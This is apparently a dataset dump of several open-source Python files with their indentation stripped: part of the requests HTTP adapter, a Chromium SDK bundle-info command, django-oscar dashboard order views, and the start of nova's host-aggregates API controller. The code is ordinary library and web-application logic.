:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
"""
if not proxy in self.proxy_manager:
proxy_headers = self.proxy_headers(proxy)
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs)
return self.proxy_manager[proxy]
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(url.lower()).scheme)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_manager = self.proxy_manager_for(proxy)
conn = proxy_manager.connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes to proxy URLs.
"""
proxies = proxies or {}
scheme = urlparse(request.url).scheme
proxy = proxies.get(scheme)
if proxy and scheme != 'https':
url, _ = urldefrag(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
:param kwargs: Optional additional keyword arguments.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) The timeout on the request.
:param verify: (optional) Whether to verify SSL certificates.
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=Retry(self.max_retries, read=False),
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
else:
# All is well, return the connection to the pool.
conn._put_conn(low_conn)
except socket.error as sockerr:
raise ConnectionError(sockerr, request=request)
except MaxRetryError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e, request=request)
elif isinstance(e, TimeoutError):
raise Timeout(e, request=request)
else:
raise
return self.build_response(request, resp)
|
mit
|
cvsuser-chromium/chromium
|
native_client_sdk/src/build_tools/sdk_tools/command/info.py
|
160
|
1162
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import command_common
import logging
import manifest_util
def Info(manifest, bundle_names):
valid_bundles, invalid_bundles = command_common.GetValidBundles(manifest,
bundle_names)
if invalid_bundles:
logging.warn('Unknown bundle(s): %s\n' % (', '.join(invalid_bundles)))
if not valid_bundles:
logging.warn('No valid bundles given.')
return
for bundle_name in valid_bundles:
bundle = manifest.GetBundle(bundle_name)
print bundle.name
for key in sorted(bundle.iterkeys()):
value = bundle[key]
if key == manifest_util.ARCHIVES_KEY:
for archive in bundle.GetArchives():
print ' Archive:'
if archive:
for archive_key in sorted(archive.iterkeys()):
print ' %s: %s' % (archive_key, archive[archive_key])
elif key not in (manifest_util.ARCHIVES_KEY, manifest_util.NAME_KEY):
print ' %s: %s' % (key, value)
print
|
bsd-3-clause
|
ZazieTheBeast/oscar
|
src/oscar/apps/dashboard/orders/views.py
|
15
|
33150
|
import datetime
from collections import OrderedDict
from decimal import Decimal as D
from decimal import InvalidOperation
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db.models import Q, Count, Sum, fields
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DetailView, FormView, ListView, UpdateView
from oscar.apps.order import exceptions as order_exceptions
from oscar.apps.payment.exceptions import PaymentError
from oscar.core.compat import UnicodeCSVWriter
from oscar.core.loading import get_class, get_model
from oscar.core.utils import datetime_combine, format_datetime
from oscar.views import sort_queryset
from oscar.views.generic import BulkEditMixin
Partner = get_model('partner', 'Partner')
Transaction = get_model('payment', 'Transaction')
SourceType = get_model('payment', 'SourceType')
Order = get_model('order', 'Order')
OrderNote = get_model('order', 'OrderNote')
ShippingAddress = get_model('order', 'ShippingAddress')
Line = get_model('order', 'Line')
ShippingEventType = get_model('order', 'ShippingEventType')
PaymentEventType = get_model('order', 'PaymentEventType')
EventHandler = get_class('order.processing', 'EventHandler')
OrderStatsForm = get_class('dashboard.orders.forms', 'OrderStatsForm')
OrderSearchForm = get_class('dashboard.orders.forms', 'OrderSearchForm')
OrderNoteForm = get_class('dashboard.orders.forms', 'OrderNoteForm')
ShippingAddressForm = get_class(
'dashboard.orders.forms', 'ShippingAddressForm')
OrderStatusForm = get_class('dashboard.orders.forms', 'OrderStatusForm')
def queryset_orders_for_user(user):
"""
Returns a queryset of all orders that a user is allowed to access.
A staff user may access all orders.
To allow access to an order for a non-staff user, at least one line's
partner has to have the user in the partner's list.
"""
queryset = Order._default_manager.select_related(
'billing_address', 'billing_address__country',
'shipping_address', 'shipping_address__country',
'user'
).prefetch_related('lines')
if user.is_staff:
return queryset
else:
partners = Partner._default_manager.filter(users=user)
return queryset.filter(lines__partner__in=partners).distinct()
def get_order_for_user_or_404(user, number):
try:
return queryset_orders_for_user(user).get(number=number)
except ObjectDoesNotExist:
raise Http404()
class OrderStatsView(FormView):
"""
Dashboard view for order statistics.
Supports the permission-based dashboard.
"""
template_name = 'dashboard/orders/statistics.html'
form_class = OrderStatsForm
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def form_valid(self, form):
ctx = self.get_context_data(form=form,
filters=form.get_filters())
return self.render_to_response(ctx)
def get_form_kwargs(self):
kwargs = super(OrderStatsView, self).get_form_kwargs()
kwargs['data'] = self.request.GET
return kwargs
def get_context_data(self, **kwargs):
ctx = super(OrderStatsView, self).get_context_data(**kwargs)
filters = kwargs.get('filters', {})
ctx.update(self.get_stats(filters))
ctx['title'] = kwargs['form'].get_filter_description()
return ctx
def get_stats(self, filters):
orders = queryset_orders_for_user(self.request.user).filter(**filters)
stats = {
'total_orders': orders.count(),
'total_lines': Line.objects.filter(order__in=orders).count(),
'total_revenue': orders.aggregate(
Sum('total_incl_tax'))['total_incl_tax__sum'] or D('0.00'),
'order_status_breakdown': orders.order_by('status').values(
'status').annotate(freq=Count('id'))
}
return stats
class OrderListView(BulkEditMixin, ListView):
"""
Dashboard view for a list of orders.
Supports the permission-based dashboard.
"""
model = Order
context_object_name = 'orders'
template_name = 'dashboard/orders/order_list.html'
form_class = OrderSearchForm
paginate_by = settings.OSCAR_DASHBOARD_ITEMS_PER_PAGE
actions = ('download_selected_orders', 'change_order_statuses')
def dispatch(self, request, *args, **kwargs):
# base_queryset is equal to all orders the user is allowed to access
self.base_queryset = queryset_orders_for_user(
request.user).order_by('-date_placed')
return super(OrderListView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
if 'order_number' in request.GET and request.GET.get(
'response_format', 'html') == 'html':
# Redirect to Order detail page if valid order number is given
try:
order = self.base_queryset.get(
number=request.GET['order_number'])
except Order.DoesNotExist:
pass
else:
return redirect(
'dashboard:order-detail', number=order.number)
return super(OrderListView, self).get(request, *args, **kwargs)
def get_queryset(self): # noqa (too complex (19))
"""
Build the queryset for this list.
"""
queryset = sort_queryset(self.base_queryset, self.request,
['number', 'total_incl_tax'])
# Look for shortcut query filters
if 'order_status' in self.request.GET:
self.form = self.form_class()
status = self.request.GET['order_status']
if status.lower() == 'none':
status = None
return self.base_queryset.filter(status=status)
if 'order_number' not in self.request.GET:
self.form = self.form_class()
return queryset
self.form = self.form_class(self.request.GET)
if not self.form.is_valid():
return queryset
data = self.form.cleaned_data
if data['order_number']:
queryset = self.base_queryset.filter(
number__istartswith=data['order_number'])
if data['name']:
# If the value is two words, then assume they are first name and
# last name
parts = data['name'].split()
allow_anon = getattr(settings, 'OSCAR_ALLOW_ANON_CHECKOUT', False)
if len(parts) == 1:
parts = [data['name'], data['name']]
else:
parts = [parts[0], parts[1:]]
filter = Q(user__first_name__istartswith=parts[0])
filter |= Q(user__last_name__istartswith=parts[1])
if allow_anon:
filter |= Q(billing_address__first_name__istartswith=parts[0])
filter |= Q(shipping_address__first_name__istartswith=parts[0])
filter |= Q(billing_address__last_name__istartswith=parts[1])
filter |= Q(shipping_address__last_name__istartswith=parts[1])
queryset = queryset.filter(filter).distinct()
if data['product_title']:
queryset = queryset.filter(
lines__title__istartswith=data['product_title']).distinct()
if data['upc']:
queryset = queryset.filter(lines__upc=data['upc'])
if data['partner_sku']:
queryset = queryset.filter(lines__partner_sku=data['partner_sku'])
if data['date_from'] and data['date_to']:
date_to = datetime_combine(data['date_to'], datetime.time.max)
date_from = datetime_combine(data['date_from'], datetime.time.min)
queryset = queryset.filter(
date_placed__gte=date_from, date_placed__lt=date_to)
elif data['date_from']:
date_from = datetime_combine(data['date_from'], datetime.time.min)
queryset = queryset.filter(date_placed__gte=date_from)
elif data['date_to']:
date_to = datetime_combine(data['date_to'], datetime.time.max)
queryset = queryset.filter(date_placed__lt=date_to)
if data['voucher']:
queryset = queryset.filter(
discounts__voucher_code=data['voucher']).distinct()
if data['payment_method']:
queryset = queryset.filter(
sources__source_type__code=data['payment_method']).distinct()
if data['status']:
queryset = queryset.filter(status=data['status'])
return queryset
def get_search_filter_descriptions(self): # noqa (too complex (19))
"""Describe the filters used in the search.
These are user-facing messages describing what filters
were used to filter orders in the search query.
Returns:
list of unicode messages
"""
descriptions = []
# Attempt to retrieve data from the submitted form
# If the form hasn't been submitted, then `cleaned_data`
# won't be set, so default to None.
data = getattr(self.form, 'cleaned_data', None)
if data is None:
return descriptions
if data.get('order_number'):
descriptions.append(
_('Order number starts with "{order_number}"').format(
order_number=data['order_number']
)
)
if data.get('name'):
descriptions.append(
_('Customer name matches "{customer_name}"').format(
customer_name=data['name']
)
)
if data.get('product_title'):
descriptions.append(
_('Product name matches "{product_name}"').format(
product_name=data['product_title']
)
)
if data.get('upc'):
descriptions.append(
# Translators: "UPC" means "universal product code" and it is
# used to uniquely identify a product in an online store.
# "Item" in this context means an item in an order placed
# in an online store.
_('Includes an item with UPC "{upc}"').format(
upc=data['upc']
)
)
if data.get('partner_sku'):
descriptions.append(
# Translators: "SKU" means "stock keeping unit" and is used to
# identify products that can be shipped from an online store.
# A "partner" is a company that ships items to users who
# buy things in an online store.
_('Includes an item with partner SKU "{partner_sku}"').format(
partner_sku=data['partner_sku']
)
)
if data.get('date_from') and data.get('date_to'):
descriptions.append(
# Translators: This string refers to orders in an online
# store that were made within a particular date range.
_('Placed between {start_date} and {end_date}').format(
start_date=data['date_from'],
end_date=data['date_to']
)
)
elif data.get('date_from'):
descriptions.append(
# Translators: This string refers to orders in an online store
# that were made after a particular date.
_('Placed after {start_date}').format(
start_date=data['date_from'])
)
elif data.get('date_to'):
end_date = data['date_to'] + datetime.timedelta(days=1)
descriptions.append(
# Translators: This string refers to orders in an online store
# that were made before a particular date.
_('Placed before {end_date}').format(end_date=end_date)
)
if data.get('voucher'):
descriptions.append(
# Translators: A "voucher" is a coupon that can be applied to
# an order in an online store in order to receive a discount.
# The voucher "code" is a string that users can enter to
# receive the discount.
_('Used voucher code "{voucher_code}"').format(
voucher_code=data['voucher'])
)
if data.get('payment_method'):
payment_type = SourceType.objects.get(code=data['payment_method'])
descriptions.append(
# Translators: A payment method is a way of paying for an
# item in an online store. For example, a user can pay
# with a credit card or PayPal.
_('Paid using {payment_method}').format(
payment_method=payment_type.name
)
)
if data.get('status'):
descriptions.append(
# Translators: This string refers to an order in an
# online store. Some examples of order status are
# "purchased", "cancelled", or "refunded".
_('Order status is {order_status}').format(
order_status=data['status'])
)
return descriptions
def get_context_data(self, **kwargs):
ctx = super(OrderListView, self).get_context_data(**kwargs)
ctx['form'] = self.form
ctx['order_statuses'] = Order.all_statuses()
ctx['search_filters'] = self.get_search_filter_descriptions()
return ctx
def is_csv_download(self):
return self.request.GET.get('response_format', None) == 'csv'
def get_paginate_by(self, queryset):
return None if self.is_csv_download() else self.paginate_by
def render_to_response(self, context, **response_kwargs):
if self.is_csv_download():
return self.download_selected_orders(
self.request,
context['object_list'])
return super(OrderListView, self).render_to_response(
context, **response_kwargs)
def get_download_filename(self, request):
return 'orders.csv'
def download_selected_orders(self, request, orders):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s' \
% self.get_download_filename(request)
writer = UnicodeCSVWriter(open_file=response)
meta_data = (('number', _('Order number')),
('value', _('Order value')),
('date', _('Date of purchase')),
('num_items', _('Number of items')),
('status', _('Order status')),
('customer', _('Customer email address')),
('shipping_address_name', _('Deliver to name')),
('billing_address_name', _('Bill to name')),
)
columns = OrderedDict()
for k, v in meta_data:
columns[k] = v
writer.writerow(columns.values())
for order in orders:
row = columns.copy()
row['number'] = order.number
row['value'] = order.total_incl_tax
row['date'] = format_datetime(order.date_placed, 'DATETIME_FORMAT')
row['num_items'] = order.num_items
row['status'] = order.status
row['customer'] = order.email
if order.shipping_address:
row['shipping_address_name'] = order.shipping_address.name
else:
row['shipping_address_name'] = ''
if order.billing_address:
row['billing_address_name'] = order.billing_address.name
else:
row['billing_address_name'] = ''
writer.writerow(row.values())
return response
def change_order_statuses(self, request, orders):
for order in orders:
self.change_order_status(request, order)
return redirect('dashboard:order-list')
def change_order_status(self, request, order):
# This method is pretty similar to what
# OrderDetailView.change_order_status does. Ripe for refactoring.
new_status = request.POST['new_status'].strip()
if not new_status:
messages.error(request, _("The new status '%s' is not valid")
% new_status)
elif new_status not in order.available_statuses():
messages.error(request, _("The new status '%s' is not valid for"
" this order") % new_status)
else:
handler = EventHandler(request.user)
old_status = order.status
try:
handler.handle_order_status_change(order, new_status)
except PaymentError as e:
messages.error(request, _("Unable to change order status due"
" to payment error: %s") % e)
else:
msg = _("Order status changed from '%(old_status)s' to"
" '%(new_status)s'") % {'old_status': old_status,
'new_status': new_status}
messages.info(request, msg)
order.notes.create(
user=request.user, message=msg, note_type=OrderNote.SYSTEM)
class OrderDetailView(DetailView):
"""
Dashboard view to display a single order.
Supports the permission-based dashboard.
"""
model = Order
context_object_name = 'order'
template_name = 'dashboard/orders/order_detail.html'
# These strings are method names that are allowed to be called from a
# submitted form.
order_actions = ('save_note', 'delete_note', 'change_order_status',
'create_order_payment_event')
line_actions = ('change_line_statuses', 'create_shipping_event',
'create_payment_event')
def get_object(self, queryset=None):
return get_order_for_user_or_404(
self.request.user, self.kwargs['number'])
def post(self, request, *args, **kwargs):
# For POST requests, we use a dynamic dispatch technique where a
# parameter specifies what we're trying to do with the form submission.
# We distinguish between order-level actions and line-level actions.
order = self.object = self.get_object()
# Look for order-level action first
if 'order_action' in request.POST:
return self.handle_order_action(
request, order, request.POST['order_action'])
# Look for line-level action
if 'line_action' in request.POST:
return self.handle_line_action(
request, order, request.POST['line_action'])
return self.reload_page(error=_("No valid action submitted"))
def handle_order_action(self, request, order, action):
if action not in self.order_actions:
return self.reload_page(error=_("Invalid action"))
return getattr(self, action)(request, order)
def handle_line_action(self, request, order, action):
if action not in self.line_actions:
return self.reload_page(error=_("Invalid action"))
# Load requested lines
line_ids = request.POST.getlist('selected_line')
if len(line_ids) == 0:
return self.reload_page(error=_(
"You must select some lines to act on"))
lines = order.lines.filter(id__in=line_ids)
if len(line_ids) != len(lines):
return self.reload_page(error=_("Invalid lines requested"))
# Build list of line quantities
line_quantities = []
for line in lines:
qty = request.POST.get('selected_line_qty_%s' % line.id)
try:
qty = int(qty)
except ValueError:
qty = None
if qty is None or qty <= 0:
error_msg = _("The entered quantity for line #%s is not valid")
return self.reload_page(error=error_msg % line.id)
elif qty > line.quantity:
error_msg = _(
"The entered quantity for line #%(line_id)s "
"should not be higher than %(quantity)s")
kwargs = {'line_id': line.id, 'quantity': line.quantity}
return self.reload_page(error=error_msg % kwargs)
line_quantities.append(qty)
return getattr(self, action)(
request, order, lines, line_quantities)
def reload_page(self, fragment=None, error=None):
url = reverse('dashboard:order-detail',
kwargs={'number': self.object.number})
if fragment:
url += '#' + fragment
if error:
messages.error(self.request, error)
return HttpResponseRedirect(url)
def get_context_data(self, **kwargs):
ctx = super(OrderDetailView, self).get_context_data(**kwargs)
ctx['active_tab'] = kwargs.get('active_tab', 'lines')
# Forms
ctx['note_form'] = self.get_order_note_form()
ctx['order_status_form'] = self.get_order_status_form()
ctx['line_statuses'] = Line.all_statuses()
ctx['shipping_event_types'] = ShippingEventType.objects.all()
ctx['payment_event_types'] = PaymentEventType.objects.all()
ctx['payment_transactions'] = self.get_payment_transactions()
return ctx
# Data fetching methods for template context
def get_payment_transactions(self):
return Transaction.objects.filter(
source__order=self.object)
def get_order_note_form(self):
kwargs = {
'order': self.object,
'user': self.request.user,
'data': None
}
if self.request.method == 'POST':
kwargs['data'] = self.request.POST
note_id = self.kwargs.get('note_id', None)
if note_id:
note = get_object_or_404(OrderNote, order=self.object, id=note_id)
if note.is_editable():
kwargs['instance'] = note
return OrderNoteForm(**kwargs)
def get_order_status_form(self):
data = None
if self.request.method == 'POST':
data = self.request.POST
return OrderStatusForm(order=self.object, data=data)
# Order-level actions
def save_note(self, request, order):
form = self.get_order_note_form()
if form.is_valid():
form.save()
messages.success(self.request, _("Note saved"))
return self.reload_page(fragment='notes')
ctx = self.get_context_data(note_form=form, active_tab='notes')
return self.render_to_response(ctx)
def delete_note(self, request, order):
try:
note = order.notes.get(id=request.POST.get('note_id', None))
except ObjectDoesNotExist:
messages.error(request, _("Note cannot be deleted"))
else:
messages.info(request, _("Note deleted"))
note.delete()
return self.reload_page()
def change_order_status(self, request, order):
form = self.get_order_status_form()
if not form.is_valid():
return self.reload_page(error=_("Invalid form submission"))
old_status, new_status = order.status, form.cleaned_data['new_status']
handler = EventHandler(request.user)
success_msg = _(
"Order status changed from '%(old_status)s' to "
"'%(new_status)s'") % {'old_status': old_status,
'new_status': new_status}
try:
handler.handle_order_status_change(
order, new_status, note_msg=success_msg)
except PaymentError as e:
messages.error(
request, _("Unable to change order status due to "
"payment error: %s") % e)
except order_exceptions.InvalidOrderStatus as e:
# The form should validate against this, so we should only end up
# here during race conditions.
messages.error(
request, _("Unable to change order status as the requested "
"new status is not valid"))
else:
messages.info(request, success_msg)
return self.reload_page()
def create_order_payment_event(self, request, order):
"""
Create a payment event for the whole order
"""
amount_str = request.POST.get('amount', None)
try:
amount = D(amount_str)
except InvalidOperation:
messages.error(request, _("Please choose a valid amount"))
return self.reload_page()
return self._create_payment_event(request, order, amount)
# Line-level actions
def change_line_statuses(self, request, order, lines, quantities):
new_status = request.POST['new_status'].strip()
if not new_status:
messages.error(request, _("The new status '%s' is not valid")
% new_status)
return self.reload_page()
errors = []
for line in lines:
if new_status not in line.available_statuses():
errors.append(_("'%(status)s' is not a valid new status for"
" line %(line_id)d") % {'status': new_status,
'line_id': line.id})
if errors:
messages.error(request, "\n".join(errors))
return self.reload_page()
msgs = []
for line in lines:
msg = _("Status of line #%(line_id)d changed from '%(old_status)s'"
" to '%(new_status)s'") % {'line_id': line.id,
'old_status': line.status,
'new_status': new_status}
msgs.append(msg)
line.set_status(new_status)
message = "\n".join(msgs)
messages.info(request, message)
order.notes.create(user=request.user, message=message,
note_type=OrderNote.SYSTEM)
return self.reload_page()
def create_shipping_event(self, request, order, lines, quantities):
code = request.POST['shipping_event_type']
try:
event_type = ShippingEventType._default_manager.get(code=code)
except ShippingEventType.DoesNotExist:
messages.error(request, _("The event type '%s' is not valid")
% code)
return self.reload_page()
reference = request.POST.get('reference', None)
try:
EventHandler().handle_shipping_event(order, event_type, lines,
quantities,
reference=reference)
except order_exceptions.InvalidShippingEvent as e:
messages.error(request,
_("Unable to create shipping event: %s") % e)
except order_exceptions.InvalidStatus as e:
messages.error(request,
_("Unable to create shipping event: %s") % e)
except PaymentError as e:
messages.error(request, _("Unable to create shipping event due to"
" payment error: %s") % e)
else:
messages.success(request, _("Shipping event created"))
return self.reload_page()
def create_payment_event(self, request, order, lines, quantities):
"""
Create a payment event for a subset of order lines
"""
amount_str = request.POST.get('amount', None)
# If no amount passed, then we add up the total of the selected lines
if not amount_str:
amount = sum([line.line_price_incl_tax for line in lines])
else:
try:
amount = D(amount_str)
except InvalidOperation:
messages.error(request, _("Please choose a valid amount"))
return self.reload_page()
return self._create_payment_event(request, order, amount, lines,
quantities)
def _create_payment_event(self, request, order, amount, lines=None,
quantities=None):
code = request.POST.get('payment_event_type')
try:
event_type = PaymentEventType._default_manager.get(code=code)
except PaymentEventType.DoesNotExist:
messages.error(
request, _("The event type '%s' is not valid") % code)
return self.reload_page()
try:
EventHandler().handle_payment_event(
order, event_type, amount, lines, quantities)
except PaymentError as e:
messages.error(request, _("Unable to create payment event due to"
" payment error: %s") % e)
except order_exceptions.InvalidPaymentEvent as e:
messages.error(
request, _("Unable to create payment event: %s") % e)
else:
messages.info(request, _("Payment event created"))
return self.reload_page()
class LineDetailView(DetailView):
"""
Dashboard view to show a single line of an order.
Supports the permission-based dashboard.
"""
model = Line
context_object_name = 'line'
template_name = 'dashboard/orders/line_detail.html'
def get_object(self, queryset=None):
order = get_order_for_user_or_404(self.request.user,
self.kwargs['number'])
try:
return order.lines.get(pk=self.kwargs['line_id'])
except self.model.DoesNotExist:
raise Http404()
def get_context_data(self, **kwargs):
ctx = super(LineDetailView, self).get_context_data(**kwargs)
ctx['order'] = self.object.order
return ctx
def get_changes_between_models(model1, model2, excludes=None):
"""
Return a dict of differences between two model instances
"""
if excludes is None:
excludes = []
changes = {}
for field in model1._meta.fields:
if (isinstance(field, (fields.AutoField,
fields.related.RelatedField))
or field.name in excludes):
continue
if field.value_from_object(model1) != field.value_from_object(model2):
changes[field.verbose_name] = (field.value_from_object(model1),
field.value_from_object(model2))
return changes
def get_change_summary(model1, model2):
"""
Generate a summary of the changes between two address models
"""
changes = get_changes_between_models(model1, model2, ['search_text'])
change_descriptions = []
for field, delta in changes.items():
change_descriptions.append(_("%(field)s changed from '%(old_value)s'"
" to '%(new_value)s'")
% {'field': field,
'old_value': delta[0],
'new_value': delta[1]})
return "\n".join(change_descriptions)
class ShippingAddressUpdateView(UpdateView):
"""
Dashboard view to update an order's shipping address.
Supports the permission-based dashboard.
"""
model = ShippingAddress
context_object_name = 'address'
template_name = 'dashboard/orders/shippingaddress_form.html'
form_class = ShippingAddressForm
def get_object(self, queryset=None):
order = get_order_for_user_or_404(self.request.user,
self.kwargs['number'])
return get_object_or_404(self.model, order=order)
def get_context_data(self, **kwargs):
ctx = super(ShippingAddressUpdateView, self).get_context_data(**kwargs)
ctx['order'] = self.object.order
return ctx
def form_valid(self, form):
old_address = ShippingAddress.objects.get(id=self.object.id)
response = super(ShippingAddressUpdateView, self).form_valid(form)
changes = get_change_summary(old_address, self.object)
if changes:
msg = _("Delivery address updated:\n%s") % changes
self.object.order.notes.create(user=self.request.user, message=msg,
note_type=OrderNote.SYSTEM)
return response
def get_success_url(self):
messages.info(self.request, _("Delivery address updated"))
return reverse('dashboard:order-detail',
kwargs={'number': self.object.order.number, })
|
bsd-3-clause
|
ted-gould/nova
|
nova/api/openstack/compute/aggregates.py
|
13
|
8862
|
# Copyright (c) 2012 Citrix Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Aggregate admin API extension."""
import datetime
from webob import exc
from nova.api.openstack.compute.schemas import aggregates
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api import validation
from nova.compute import api as compute_api
from nova import exception
from nova.i18n import _
ALIAS = "os-aggregates"
authorize = extensions.os_compute_authorizer(ALIAS)
def _get_context(req):
return req.environ['nova.context']
class AggregateController(wsgi.Controller):
"""The Host Aggregates API controller for the OpenStack API."""
def __init__(self):
self.api = compute_api.AggregateAPI()
@extensions.expected_errors(())
def index(self, req):
"""Returns a list a host aggregate's id, name, availability_zone."""
context = _get_context(req)
authorize(context, action='index')
aggregates = self.api.get_aggregate_list(context)
return {'aggregates': [self._marshall_aggregate(a)['aggregate']
for a in aggregates]}
# NOTE(gmann): Returns 200 for backwards compatibility but should be 201
# as this operation complete the creation of aggregates resource.
@extensions.expected_errors((400, 409))
@validation.schema(aggregates.create)
def create(self, req, body):
"""Creates an aggregate, given its name and
optional availability zone.
"""
context = _get_context(req)
authorize(context, action='create')
host_aggregate = body["aggregate"]
name = host_aggregate["name"]
avail_zone = host_aggregate.get("availability_zone")
try:
aggregate = self.api.create_aggregate(context, name, avail_zone)
except exception.AggregateNameExists as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InvalidAggregateAction as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
agg = self._marshall_aggregate(aggregate)
# To maintain the same API result as before the changes for returning
# nova objects were made.
del agg['aggregate']['hosts']
del agg['aggregate']['metadata']
return agg
@extensions.expected_errors(404)
def show(self, req, id):
"""Shows the details of an aggregate, hosts and metadata included."""
context = _get_context(req)
authorize(context, action='show')
try:
aggregate = self.api.get_aggregate(context, id)
except exception.AggregateNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return self._marshall_aggregate(aggregate)
@extensions.expected_errors((400, 404, 409))
@validation.schema(aggregates.update)
def update(self, req, id, body):
"""Updates the name and/or availability_zone of given aggregate."""
context = _get_context(req)
authorize(context, action='update')
